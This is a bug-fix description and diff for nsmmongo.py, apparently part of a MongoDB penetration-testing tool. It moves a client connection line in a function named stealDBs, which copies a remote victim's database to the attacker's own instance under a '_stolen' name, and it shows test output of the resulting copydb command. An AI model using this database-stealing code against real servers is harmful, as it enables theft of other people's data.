Description: put the code "myDBConn = pymongo.MongoClient(myDB, 27017…

…)" out of the "if" statements, because if don't do this, the code in line number 174 will be not executed if user select the option that require credentials.

lead test:
Exception e is "local variable 'myDBConn' referenced before assignment". It indicates the code in line number 174 will be not executed if user select the option that require credentials.

After modification
Exception e is "command SON([('copydb', 1), ('username', 'youngyangyang04'), ('nonce', u'b9d5887c5f7cc17c'), ('fromdb', u'admin'), ('todb', u'admin_stolen'), ('key', u'dcfd7214988466b2f620809fd27015b4'), ('fromhost', '128.95.1.27')]) failed: unable to login { code: 18, ok: 0.0, errmsg: "auth fails” }"
So the code in line number 174 works

nsmmongo.py

@@ -163,9 +163,9 @@ def stealDBs(myDB,victim,mongoConn):
 	try:
 		#Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
 		dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
-
+		myDBConn = pymongo.MongoClient(myDB, 27017)
 		if dbNeedCreds in no_tag:
-			myDBConn = pymongo.MongoClient(myDB,27017)
+
 			myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
 
 		elif dbNeedCreds in yes_tag:
@@ -186,6 +186,7 @@ def stealDBs(myDB,victim,mongoConn):
 			return
 
 	except Exception, e:
+#		print str(e)
 		if str(e).find('text search not enabled') != -1:
 			raw_input("Database copied, but text indexing was not enabled on the target.  Indexes not moved.  Press enter to return...")
 			return